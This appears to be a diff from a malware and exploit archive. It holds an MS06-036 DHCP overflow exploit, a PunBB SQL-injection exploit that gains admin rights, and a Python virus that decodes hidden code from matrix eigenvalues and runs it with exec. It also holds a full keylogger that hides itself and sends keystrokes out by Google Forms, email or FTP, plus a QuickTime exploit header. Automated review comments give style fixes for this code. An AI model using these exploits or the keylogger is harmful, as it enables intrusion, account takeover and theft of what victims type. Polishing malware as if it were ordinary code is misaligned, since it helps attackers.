append = "\xfa\xff" + ( "\x90" * 0xff )
|
||||
|
||||
p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')
|
||||
|
||||
print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
|
||||
sendp(p, iface=inet_face, verbose=False)
|
||||
|
||||
def HandleDhcpRequest(self, packet):
|
||||
|
||||
|
||||
ip = packet.GetOption("request_ip_address")
|
||||
sid = packet.GetOption("server_identifier")
|
||||
ciaddr = packet.GetOption("ciaddr")
|
||||
my_reqip = ''
|
||||
try:
|
||||
data = packet.options_data['request_ip_address']
|
||||
for i in range(0,len(data),4) :
|
||||
if len(data[i:i+4]) == 4 :
|
||||
my_reqip += ipv4(data[i:i+4]).str()
|
||||
except:
|
||||
my_reqip = default_ip
|
||||
|
||||
mymac = hwmac(packet.GetHardwareAddress()).str()
|
||||
print "** Received request from %s (%s)" % (my_reqip,mymac)
|
||||
sid_i = my_reqip.rfind(".")
|
||||
server_ip = my_reqip[0:sid_i] + ".254"
|
||||
|
||||
our_ip = my_reqip[0:sid_i] + ".2"
|
||||
|
||||
mypacket = DhcpPacket()
|
||||
mypacket.CreateDhcpAckPacketFrom(packet)
|
||||
mypacket.SetOption("yiaddr", ipv4(my_reqip).list())
|
||||
|
||||
dumbstr = "\x90" * 0xFF
|
||||
|
||||
# we're looking for a jmp/call ebx ?! or landing in our codespace
|
||||
# directly
|
||||
|
||||
# C5 converts to 253C
|
||||
# BB = 2557
|
||||
# AA = 00AC
|
||||
# DD = 258C
|
||||
# EE = 03B5
|
||||
# 88 = 00D6
|
||||
# 99 = 00EA
|
||||
# F3 = 2591
|
||||
# B0 = 2264
|
||||
# 8F = 00c5
|
||||
|
||||
eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
|
||||
#eipstr = "C" * 0xFF
|
||||
|
||||
|
||||
payload = "\x42" * 0xFF
|
||||
payload = substr(payload, scode, 1)
|
||||
|
||||
|
||||
## find location in heap to ret2
|
||||
# find offset & append as many "\x26\x6e\x43\x6e"
|
||||
# to increment ebx to a non trashed location (since ebx points to our code)
|
||||
# then push ebx \x53 and \xc4 (retn)
|
||||
#
|
||||
# we're looking for a pop+pop+ret or a jmp/call ebx to return to our
|
||||
# unicode filtered input
|
||||
# note it must be iwthin the bounds of 0x0000**** - 0x0070****
|
||||
# or 0x22***** <-- wont help us
|
||||
|
||||
append = "\x0f\xff" + ( "\x90" * 0xff )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( eipstr )
|
||||
append += "\xfa\xff" + ( eipstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( dumbstr )
|
||||
append += "\xfa\xff" + ( payload[0:254]) + "\x00"
|
||||
|
||||
print "Length of our attack: %r" % len(append)
|
||||
|
||||
eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
|
||||
p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
|
||||
print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
|
||||
for i in p:
|
||||
sendp(eth/i, iface=inet_face, verbose=False)
|
||||
|
||||
def HandleDhcpDecline(self, packet):
|
||||
return
|
||||
#print "** Dhcp Declined"
|
||||
#packet.PrintHeaders()
|
||||
#packet.PrintOptions()
|
||||
|
||||
def HandleDhcpRelease(self, packet):
|
||||
return
|
||||
#packet.PrintHeaders()
|
||||
#packet.PrintOptions()
|
||||
|
||||
def HandleDhcpInform(self, packet):
|
||||
return
|
||||
#packet.PrintHeaders()
|
||||
#packet.PrintOptions()
|
||||
|
||||
|
||||
|
||||
print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
|
||||
print "\t by redsand@blacksecurity.org"
|
||||
print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
|
||||
print ""
|
||||
|
||||
|
||||
if len(sys.argv) > 1:
|
||||
inet_face = sys.argv[1]
|
||||
|
||||
if len(sys.argv) > 2:
|
||||
default_ip = sys.argv[2]
|
||||
|
||||
print "Listening for client requests:\n"
|
||||
print "Listening on interface: %s" % inet_face
|
||||
print "Using default address: %s" % default_ip
|
||||
|
||||
server = Server(netopt)
|
||||
|
||||
while True :
|
||||
server.GetNextDhcpPacket()
|
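--- a/Python/Exploit.Python.PunBB.a
+++ b/Python/Exploit.Python.PunBB.a
@@ -0,0 +1,130 @@
+#!/usr/bin/python
+#######################################################################
+# _ _ _ _ ___ _ _ ___
+# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
+# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
+# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
+#
+#######################################################################
+# Proof of concept code from the Hardened-PHP Project
+#######################################################################
+#
+# -= PunBB 1.2.4 =-
+# change_email SQL injection exploit
+#
+# user-supplied data within the database is still user-supplied data
+#
+#######################################################################
+
+import urllib
+import getopt
+import sys
+import string
+
+__argv__ = sys.argv
+
+def banner():
+print "PunBB 1.2.4 - change_email SQL injection exploit"
+print "Copyright (C) 2005 Hardened-PHP Project\n"
+
+def usage():
+banner()
+print "Usage:\n"
+print " $ ./punbb_change_email.py [options]\n"
+print " -h http_url url of the punBB forum to exploit"
+print " f.e. http://www.forum.net/punBB/"
+print " -u username punBB forum useraccount"
+print " -p password punBB forum userpassword"
+print " -e email email address where the admin leve activation email is sent"
+print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
+print ""
+sys.exit(-1)
+
+def main():
+try:
+opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
+except getopt.GetoptError:
+usage()
+
+if len(__argv__) < 10:
+usage()
+
+username = None
+password = None
+email = None
+domain = None
+host = None
+for o, arg in opts:
+if o == "-h":
+host = arg
+if o == "-u":
+username = arg
+if o == "-p":
+password = arg
+if o == "-e":
+email = arg
+if o == "-d":
+domain = arg
+
+# Printout banner
+banner()
+
+# Check if everything we need is there
+if host == None:
+print "[-] need a host to connect to"
+sys.exit(-1)
+if username == None:
+print "[-] username needed to continue"
+sys.exit(-1)
+if password == None:
+print "[-] password needed to continue"
+sys.exit(-1)
+if email == None:
+print "[-] email address needed to continue"
+sys.exit(-1)
+if domain == None:
+print "[-] catch all domain needed to continue"
+sys.exit(-1)
+
+# Retrive cookie
+params = {
+'req_username' : username,
+'req_password' : password,
+'form_sent' : 1
+}
+
+wclient = urllib.URLopener()
+
+print "[+] Connecting to retrieve cookie"
+
+req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
+info = req.info()
+if 'set-cookie' not in info:
+print "[-] Unable to retrieve cookie... something is wrong"
+sys.exit(-3)
+cookie = info['set-cookie']
+cookie = cookie[:string.find(cookie, ';')]
+print "[+] Cookie found - extracting user_id"
+user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
+print "[+] User-ID: %d" % (int(user_id))
+wclient.addheader('Cookie', cookie);
+
+email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
+append = 'group_id=\'1'
+email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
+
+params = {
+'req_new_email' : email,
+'form_sent' : 1
+}
+
+print "[+] Connecting to request change email"
+req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
+
+print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
+
+if __name__ == "__main__":
+main()
+
+
+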
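Review bot: The five `None` checks in `main()` (`if host == None:` through `if domain == None:`) compare with `==` where identity is meant; `if host is None:` is the idiomatic form, since `None` is a singleton and `==` dispatches to the operand's `__eq__`. The option loop tests `if o == "-h":` … `if o == "-d":` as five independent `if` statements where the cases are mutually exclusive and read better as an `if`/`elif` chain, `args` returned by `getopt.getopt` is never used and could be `_args`, and `wclient.addheader('Cookie', cookie);` carries a stray trailing semicolon.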
208
Python/Kirk_ransomware.py
File diff suppressed because one or more lines are too long
220
Python/RedKeeper-ransomware_source.py
File diff suppressed because one or more lines are too long
BIN
Python/Scrypt.7z
Binary file not shown.
BIN
Python/Sin.7z
Binary file not shown.
98
Python/Virus.Python.Agent.c
@ -0,0 +1,98 @@
|
||||
def root3(num):
|
||||
fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j
|
||||
fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j
|
||||
a=num**(1/3.0)
|
||||
b=a*fak1
|
||||
c=a*fak2
|
||||
return([a,b,c])
|
||||
|
||||
def getPQ(a,b,c):
|
||||
p = b-((a**2)/3.0)
|
||||
q = c + ((2*(a**3)-9*a*b)/27.0)
|
||||
return([p,q])
|
||||
|
||||
def getU(p,q):
|
||||
u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)
|
||||
return(root3(u3))
|
||||
|
||||
def getLambda(a,p,u):
|
||||
if u[0] == 0:
|
||||
L0=u[0] - a/3.0
|
||||
else:
|
||||
L0=u[0] - p/(3.0*u[0]) - a/3.0
|
||||
|
||||
if u[1] == 0:
|
||||
L1=-a/3.0
|
||||
else:
|
||||
L1=u[1] - p/(3.0*u[1]) - a/3.0
|
||||
|
||||
if u[2] == 0:
|
||||
L2=-a/3.0
|
||||
else:
|
||||
L2=u[2] - p/(3.0*u[2]) - a/3.0
|
||||
|
||||
return(L0,L1,L2)
|
||||
|
||||
def getABC(mtx):
|
||||
a=-(mtx[0]+mtx[4]+mtx[8])
|
||||
b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]
|
||||
c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]
|
||||
return([a,b,c])
|
||||
|
||||
def eigenvalues(mtx):
|
||||
ABC=getABC(mtx)
|
||||
PQ=getPQ(ABC[0],ABC[1],ABC[2])
|
||||
U=getU(PQ[0],PQ[1])
|
||||
L=getLambda(ABC[0],PQ[0],U)
|
||||
return(L)
|
||||
|
||||
def getstring(M):
|
||||
str=''
|
||||
for c in range(len(M)):
|
||||
mLD=eigenvalues(M[c])
|
||||
for i in range(len(mLD)+1):
|
||||
for n in range(len(mLD)):
|
||||
if round(mLD[n].imag)==i:
|
||||
str+=chr(int(round(mLD[n].real)))
|
||||
return(str)
|
||||
|
||||
M=[]
|
||||
M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),])
|
||||
M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),])
|
||||
M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),])
|
||||
M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),])
|
||||
M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),])
|
||||
M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),])
|
||||
M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),])
|
||||
M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),])
|
||||
M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),])
|
||||
M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),])
|
||||
M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),])
|
||||
M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),])
|
||||
M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),])
|
||||
M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),])
|
||||
M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),])
|
||||
M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),])
|
||||
M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),])
|
||||
M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),])
|
||||
M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),])
|
||||
M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),])
|
||||
M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),])
|
||||
M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),])
|
||||
M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),])
|
||||
M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),])
|
||||
M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),])
|
||||
M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),])
|
||||
M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),])
|
||||
M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),])
|
||||
M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),])
|
||||
M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),])
|
||||
M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),])
|
||||
M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),])
|
||||
M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),])
|
||||
M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),])
|
||||
M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),])
|
||||
M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),])
|
||||
M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),])
|
||||
myMTXcode=getstring(M)
|
||||
exec(myMTXcode)
|
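Review bot: `exec(myMTXcode)` at the end of the file runs text that exists only after `getstring(M)` reconstructs it from the eigenvalues of the hard-coded complex matrices, so the code actually executed is not reviewable from the source as committed; for analysis the last line should be `print repr(myMTXcode)` so the generated text can be inspected statically, with `exec` kept out of the path. Independently, `getstring` shadows the builtin `str` by using it as the accumulator (`str=''`), which should be renamed, e.g. `out`, since the function also relies on `chr(int(round(...)))` and any later call to `str()` inside it would fail. A one-line docstring on `eigenvalues` stating that it returns the three roots of the characteristic cubic of the 3x3 matrix passed as a flat 9-element list would make the numeric helpers readable without tracing `getABC` and `getLambda`.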
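--- a/Python/xenotix.py
+++ b/Python/xenotix.py
@@ -0,0 +1,210 @@
+'''
+Xenotix Python Keylogger for Windows
+====================================
+Coded By: Ajin Abraham <ajin25@gmail.com>
+Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
+GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
+
+FEATURES
+========
+1.STORE LOGS LOCALLY
+2.SEND LOGS TO GOOGLE FORMS
+3.SEND LOGS TO EMAIL
+4.SEND LOGS TO FTP
+
+MINIMUM REQUIREMENTS
+===================
+Python 2.7: http://www.python.org/getit/
+pyHook Module: http://sourceforge.net/projects/pyhook/
+pyrhoncom Module: http://sourceforge.net/projects/pywin32/
+
+pyHook Module -
+Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
+
+
+NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
+'''
+try:
+import pythoncom, pyHook
+except:
+print "Please Install pythoncom and pyHook modules"
+exit(0)
+import os
+import sys
+import threading
+import urllib,urllib2
+import smtplib
+import ftplib
+import datetime,time
+import win32event, win32api, winerror
+
+#Disallowing Multiple Instance
+mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
+if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
+mutex = None
+print "Multiple Instance not Allowed"
+exit(0)
+x=''
+data=''
+count=0
+
+#Hide Console
+def hide():
+import win32console,win32gui
+window = win32console.GetConsoleWindow()
+win32gui.ShowWindow(window,0)
+return True
+def msg():
+print """Xenotix Python Keylogger for Windows
+Coder: Ajin Abraham <ajin25@gmail.com>
+OPENSECURITY.IN
+
+usage:xenotix_python_logger.py mode
+mode:
+local: store the logs in a file [keylogs.txt]
+remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
+email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
+ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
+"""
+return True
+
+#Local Keylogger
+def local():
+global data
+if len(data)>100:
+fp=open("keylogs.txt","a")
+fp.write(data)
+fp.close()
+data=''
+return True
+
+#Remote Google Form logs post
+def remote():
+global data
+if len(data)>100:
+url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
+klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
+try:
+dataenc=urllib.urlencode(klog)
+req=urllib2.Request(url,dataenc)
+response=urllib2.urlopen(req)
+data=''
+except Exception as e:
+print e
+return True
+
+#Email Logs
+class TimerClass(threading.Thread):
+def __init__(self):
+threading.Thread.__init__(self)
+self.event = threading.Event()
+def run(self):
+while not self.event.is_set():
+global data
+if len(data)>100:
+ts = datetime.datetime.now()
+SERVER = "smtp.gmail.com" #Specify Server Here
+PORT = 587 #Specify Port Here
+USER="your_email@gmail.com"#Specify Username Here
+PASS="password_here"#Specify Password Here
+FROM = USER#From address is taken from username
+TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
+SUBJECT = "Keylogger data: "+str(ts)
+MESSAGE = data
+message = """\
+From: %s
+To: %s
+Subject: %s
+
+%s
+""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
+try:
+server = smtplib.SMTP()
+server.connect(SERVER,PORT)
+server.starttls()
+server.login(USER,PASS)
+server.sendmail(FROM, TO, message)
+data=''
+server.quit()
+except Exception as e:
+print e
+self.event.wait(120)
+
+#Upload logs to FTP account
+def ftp():
+global data,count
+if len(data)>100:
+count+=1
+FILENAME="logs-"+str(count)+".txt"
+fp=open(FILENAME,"a")
+fp.write(data)
+fp.close()
+data=''
+try:
+SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
+USERNAME="ftp_username" #Specify your FTP Username
+PASSWORD="ftp_password" #Specify your FTP Password
+SSL=0 #Set 1 for SSL and 0 for normal connection
+OUTPUT_DIR="/" #Specify output directory here
+if SSL==0:
+ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
+elif SSL==1:
+ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
+ft.cwd(OUTPUT_DIR)
+fp=open(FILENAME,'rb')
+cmd= 'STOR' +' '+FILENAME
+ft.storbinary(cmd,fp)
+ft.quit()
+fp.close()
+os.remove(FILENAME)
+except Exception as e:
+print e
+return True
+
+def main():
+global x
+if len(sys.argv)==1:
+msg()
+exit(0)
+else:
+if sys.argv[1]=="local":
+x=1
+hide()
+elif sys.argv[1]=="remote":
+x=2
+hide()
+elif sys.argv[1]=="email":
+hide()
+email=TimerClass()
+email.start()
+elif sys.argv[1]=="ftp":
+x=4
+hide()
+else:
+msg()
+exit(0)
+return True
+main()
+
+def keypressed(event):
+global x,data
+if event.Ascii==13:
+keys='<ENTER>'
+elif event.Ascii==8:
+keys='<BACK SPACE>'
+elif event.Ascii==9:
+keys='<TAB>'
+else:
+keys=chr(event.Ascii)
+data=data+keys
+if x==1:
+local()
+elif x==2:
+remote()
+elif x==4:
+ftp()
+
+obj = pyHook.HookManager()
+obj.KeyDown = keypressed
+obj.HookKeyboard()
+pythoncom.PumpMessages()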
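Review bot: The bare `except:` guarding `import pythoncom, pyHook` at the top of the file catches every exception, including `SystemExit` and `KeyboardInterrupt`, and reports all of them as a missing module; `except ImportError:` is the check the message actually describes. The SMTP block in `TimerClass.run` and the FTP block in `ftp()` embed credentials (`USER`/`PASS`, `USERNAME`/`PASSWORD`) and endpoints directly in source, and with `SSL=0` the upload goes over plain FTP, so both the secrets and the captured data are exposed in transit. From a defender's standpoint the fixed mutex name `'mutex_var_xboz'`, the `keylogs.txt` file, the `logs-N.txt` naming in `ftp()` and the hard-coded `smtp.gmail.com:587` destination are stable host and network artifacts of this program that are visible to endpoint and egress monitoring.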
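--- a/Ruby/Constructor.Ruby.Qtp.a
+++ b/Ruby/Constructor.Ruby.Qtp.a
@@ -0,0 +1,61 @@
+
+#!/usr/bin/ruby
+# Copyright (c) LMH <lmh [at] info-pull.com>
+# Kevin Finisterre <kf_lists [at] digitalmunition.com>
+#
+# Notes:
+# Our command string is loaded on memory at a static address normally,
+# but this depends on execution method and the string length. The address set in this exploit will
+# be likely successful if we open the resulting QTL file directly, without having an
+# instance of Quicktime running. Although, when using another method and string, you'll need
+# to find the address.
+# For 100% reliable exploitation you can always use the /bin/sh address,
+# but that's not as a cool as having your box welcoming the new year.
+# Do whatever you prefer. That said, enjoy.
+#
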